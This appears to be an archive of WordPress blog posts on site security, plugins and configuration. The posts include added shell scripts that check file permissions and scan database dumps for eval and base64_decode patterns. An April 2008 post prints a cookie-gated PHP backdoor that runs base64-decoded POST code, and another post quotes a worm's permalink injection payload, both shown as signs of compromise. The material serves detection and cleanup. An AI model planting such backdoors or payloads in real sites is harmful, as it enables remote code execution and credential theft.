Customize Acceptable Upload File Types

February 21, 2011 | No Comments Yet

WordPress Garage points out that there’s a limited list of file types you are allowed to upload via the WP admin. Since WordPress is being used for everything these days, some custom sites will need to modify that list, and Chris Meller shows how.

As of WordPress 2.2, there are 35 allowed file types configured in the default install. While there’s no admin-based tool for editing this list (nor any plugins that I’m aware of), it’s not at all difficult to add your own…

The idea is to add a custom function to your theme’s functions.php and hook it in as a filter (the hook is upload_mimes, which hands your function the array of extension => MIME type pairs). In that function you add entries for the extensions you need with their corresponding MIME types; to remove a file type that’s allowed by default, unset() its entry from the array before returning it.

Sounds simple and painless! Of course, keep in mind that the limitations are put in place to keep WordPress secure: every account that can upload files (Author and up) can then put those file types on your server. Never add php, phtml or any other extension your web server executes, and be wary of html and svg, which can carry script that runs in your visitors’ browsers. Also, for reference, there’s a list of the accepted file types at the WordPress.com Support section, but that may vary on a self-hosted install.


Check your web host file permissions first!

November 23, 2010 | No Comments Yet

WordPress security issues come and go. Some linger because the crud is tough to get out; others linger because site owners overlook an important part of keeping their hosts protected: file permissions.

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

Matt Mullenweg warns against web hosts and other security announcements that place the blame on the WordPress software without first checking if proper file permissions are in place.

Devlounge has an old but still applicable article on protecting your wp-config.php files, for starters. This article on WP Tavern also tackles the issue above and shares more file permission advice especially on shared hosting accounts.
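Before blaming the software, it helps to have a quick way to check the permissions yourself. The following shell function is an added example (mine, not from Matt’s post or the linked articles). It assumes a Unix host where the site lives under the directory you pass in and where PHP runs as your own account (the suexec-style setup Matt describes); on a host where PHP runs as a shared web server account, wp-config.php must stay readable by that account’s group, so use mode 0640 with the web server group rather than opening it to everyone.

```shell
#!/bin/sh
# Added example (not from the original post): a quick permission audit of a WordPress install.
# Assumes a Unix host and that PHP runs as the site owner's own account (suexec/suPHP).
# Usage: wp_perm_check /home/you/public_html
# Exit status 0 = nothing found, 1 = at least one finding printed.
wp_perm_check() {
    root="$1"
    findings=0

    # World-writable files or directories: any other account on the host, and any code the
    # web server can be tricked into running, can modify them. Mode -0002 = "other" has write.
    ww=$(find "$root" \( -type f -o -type d \) -perm -0002 2>/dev/null)
    if [ -n "$ww" ]; then
        printf 'world-writable:\n%s\n' "$ww"
        findings=$((findings + 1))
    fi

    # wp-config.php holds the database credentials. When PHP runs as your own account it
    # should be readable only by you (mode 0600 or 0400); -0004 = "other" can read it.
    if [ -f "$root/wp-config.php" ]; then
        cfg=$(find "$root/wp-config.php" -perm -0004 2>/dev/null)
        if [ -n "$cfg" ]; then
            printf 'readable by everyone: %s\n' "$cfg"
            findings=$((findings + 1))
        fi
    fi

    [ "$findings" -eq 0 ]
}
```

Run it against the site root after every plugin or theme install; the usual culprit is a wp-content subdirectory that was chmod 777’d to make the admin-panel editor work and never tightened again.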


Tips on keeping your WordPress blog secure

July 22, 2010 | No Comments Yet

Make Tech Easier shares 11 tips on keeping malicious parties from penetrating your WordPress-powered blog. Here’s a snippet:

7) Change your login name

The default username is admin. You can make it more difficult for the hacker to crack your login credential by changing the login name.

You can never be too careful about these things, so be sure to follow the tips mentioned in the article.



Read & blog on WordPress.com from your iPhone via Twitter

December 31, 2009 | No Comments Yet

Here’s an odd but fascinating hack discovered by Team 55 at the WP Quebec meetup: using the Twitter API, you can read and publish posts on WordPress.com from your iPhone! Matt Mullenweg explains step by step in this article. Pretty much any third-party Twitter client is okay; the key is to change the API URL to twitter-api.wordpress.com and then you can log in using your WordPress.com account.

Instead of following users you will follow blogs. Refer to them by their domain names (e.g. matt.wordpress.com). Support for replies and retweets will be added soon.

When you post a status update using our Twitter API, the update will appear on your blog. (If you have more than one blog you can choose which one gets the updates. The option is in your profile.)

Read more about this here. Matt also announced that they plan to release a WordPress MU plugin for this, so stay tuned for that one.


Update and secure your WordPress installation

September 7, 2009 | No Comments Yet

There’s a worm circulating in the WordPress community, and it’s attacking sites that have not been updated to version 2.8.4. Lorelle reported its symptoms:

  1. “There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.””
  2. “The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.”

This certainly sounds familiar. Matt explains further:

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

It must be stressed that upgrading is a preventive measure; if you’ve been attacked, you’ll need to go through your files and databases to get rid of the offending code.

A stitch in time saves nine. Upgrading is a known quantity of work, and one that the WordPress community has tried its darndest to make as easy as possible with one-click upgrades. Fixing a hacked blog, on the other hand, is quite hard. Upgrading is taking your vitamins; fixing a hack is open heart surgery. (This is true of cost, as well.)
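As an added example (mine, not from Lorelle’s or Matt’s posts), the following shell function checks a database export for both symptoms Lorelle lists, plus the same payload in post bodies, since Matt says the worm inserts spam and malware into old posts. Reading the dump rather than the Users page also sidesteps the JavaScript the worm uses to hide its account. It assumes a mysqldump taken with --skip-extended-insert so that each row is its own INSERT line, the default wp_ table prefix, that user_login is the second column of wp_users, and that you pass the logins you created yourself as a comma-separated list.

```shell
#!/bin/sh
# Added example: scan a mysqldump of a WordPress database for the worm's traces.
# Assumptions: dump taken with --skip-extended-insert (one INSERT per row), default wp_
# table prefix, user_login is the second column of wp_users.
# Usage: wp_dump_check backup.sql admin,editor     (second arg = logins you created)
# Exit status 0 = nothing found, 1 = at least one finding printed.
wp_dump_check() {
    dump="$1"
    expected=",$2,"
    hits=0

    # 1. Code injected into the permalink structure. Both the raw and the URL-encoded form
    #    of the payload contain the literals "eval(" and "base64_decode".
    if grep -i 'permalink_structure' "$dump" | grep -Eiq 'eval\(|base64_decode'; then
        echo "injected permalink_structure"
        hits=$((hits + 1))
    fi

    # 2. The same payload planted in post content (hidden spam/malware in old posts).
    posts=$(grep "^INSERT INTO \`wp_posts\` VALUES" "$dump" | grep -Eic 'eval\(|base64_decode' || true)
    if [ "$posts" -gt 0 ]; then
        echo "posts containing eval/base64_decode: $posts"
        hits=$((hits + 1))
    fi

    # 3. Accounts you did not create ("Administrator (2)" or any unfamiliar name).
    #    sed pulls the second column (user_login) out of each wp_users row.
    logins=$(sed -n "s/^INSERT INTO \`wp_users\` VALUES ([0-9]*,'\([^']*\)'.*/\1/p" "$dump")
    while IFS= read -r login; do       # line by line: logins may contain spaces
        [ -z "$login" ] && continue
        case "$expected" in
            *",$login,"*) ;;
            *) echo "unexpected user_login: $login"; hits=$((hits + 1)) ;;
        esac
    done <<EOF
$logins
EOF

    [ "$hits" -eq 0 ]
}
```

A clean result from this check does not mean the site is clean; it only covers the traces Lorelle and Matt describe. Upgrade first, then go through files and database as the post says.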


WordPress Plugin: Injection Attack Protector

July 1, 2009 | No Comments Yet

There are a lot of types of security breaches that threaten your WordPress blog, and spam/malware injection seems to be the most popular of the lot. Fortunately there’s a plugin that helps prevent that, called the Injection Attack Protector. This script allows you to scan your site for possible injection attacks and includes a heal tool for compromised files.

Make sure to follow the given instructions for the plugin to work properly. You’ll need to know how to create a password-protected folder on your site and edit certain files through a text editor.

Download Injection Attack Protector


Protect your WordPress blog with these plugins

June 17, 2009 | No Comments Yet

With WordPress 2.8 out, it’s upgrade season for us. It also means that older, un-updated versions of WP are more exposed to attack. Keith Dsouza of Weblog Tools Collection has a list of recommended anti-spam and security plugins to help improve security on your blog:

Anti-spam WordPress Plugins

  1. Akismet
  2. WP-SpamFree Anti-Spam
  3. WP-Hashcash
  4. WP reCAPTCHA
  5. Math Comment Spam Protection

Security WordPress Plugins

  1. WP Security Scan
  2. WordPress Exploit Scanner
  3. AskApache Password Protect
  4. TTC WordPress Security Tool
  5. Secure WordPress
  6. WordPress Firewall

Check out the blog post for details and download links to each of the plugins listed above. Got any more plugins you can recommend? You can never have enough!


Errors and blank screens on your WordPress blog? You could have been hacked

April 8, 2009 | No Comments Yet

An important security issue for sites running WordPress: if you get the error “Parse error: syntax error, unexpected T_VARIABLE” or blank screens on your blog, there’s a very good chance that you have been hacked. A parse error in a core or theme file you never edited means something else changed that file, typically injected code that broke its syntax.

Design and Promote has a detailed list of steps for bringing your site back to pristine condition, but if you can’t do that on your own, you can pay them $100.00 for the service. Either way, the first and most important step is finding out whether your site has been compromised.


10 WordPress hacks

January 15, 2009 | No Comments Yet

Take your blog to the next level with this list of neat WordPress hacks, compiled by no less than Smashing Magazine and written by Jean-Baptiste Jung. Here’s what to expect:

  1. Display AdSense Ads to Search Engines Visitors Only
  2. Avoid Duplicate Posts in Multiple Loops
  3. Replacing “Next” and “Previous” Page Links with Pagination
  4. Automatically Get Images on Post Content
  5. Using Normal Quotes Instead of Curly Quotes
  6. Deny Comment Posting to No Referrer Requests
  7. Using CSS Sliding Doors in WordPress Navigation
  8. Display a Random Header Image on Your WordPress Blog
  9. List Your Scheduled Posts

Each tip may seem difficult at first, but all you have to do is follow the instructions and you’ll be good to go. Perfect for beginner and advanced WordPress lovers!


How to secure your WordPress installation

November 13, 2008 | 1 Comment

MyTestBox.com shares several important tips to keep your WordPress install secure. Here’s a summary:

  • Your “plugins” directory is NOT secured by default!
  • Choose a strong password!
  • Rename the administrative account!
  • Backup your database!
  • Log all your $_POST variables!
  • Plugins that need write access!
  • Encrypt all communication within “wp-admin” directory! (if possible)
  • Tighten up the file permissions!
  • Of course, update your WordPress!

The last one is the simplest and easiest to follow, especially with the release of WP 2.7. You should at least make sure that you upgrade to the latest version of WordPress.

The blog post also contains links to other articles on hardening WordPress and dealing with hackers, so read it now!


WordPress Plugin: WordPress Exploit Scanner

June 27, 2008 | No Comments Yet

With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.

This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.

It also allows the blog owner to search for whatever string they like which could come in handy when new exploit code is used in a hack.

Download WordPress Exploit Scanner


More WordPress blogs being hacked

June 18, 2008 | No Comments Yet

Last time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, specifically a redirect technique, that’s affecting a lot of WordPress-powered blogs.

The recent security issues concern hackers who work with Google and other search engine results and redirect traffic from your blog or website. The searcher clicks on the link and is redirected to the hacker’s site with the same search string that was used in the search engine. Most bloggers notice a problem when their site traffic drops inexplicably and/or their ad income drops.

Read Lorelle’s post for more information on detecting and eliminating this security issue.


Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters and numbers of the hash vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file and reflect these changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same name as an existing file but with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files are executable scripts that, when called from a browser, display a fake “404 Not Found” error, but when called from a script with the matching hash from one of the hacked PHP scripts, display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits, but in this particular situation we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize enough how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but a world-writable folder is also a hacker’s point of entry: anything that can run code as the web server can drop files there.

I believe the most crucial problem here is the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.
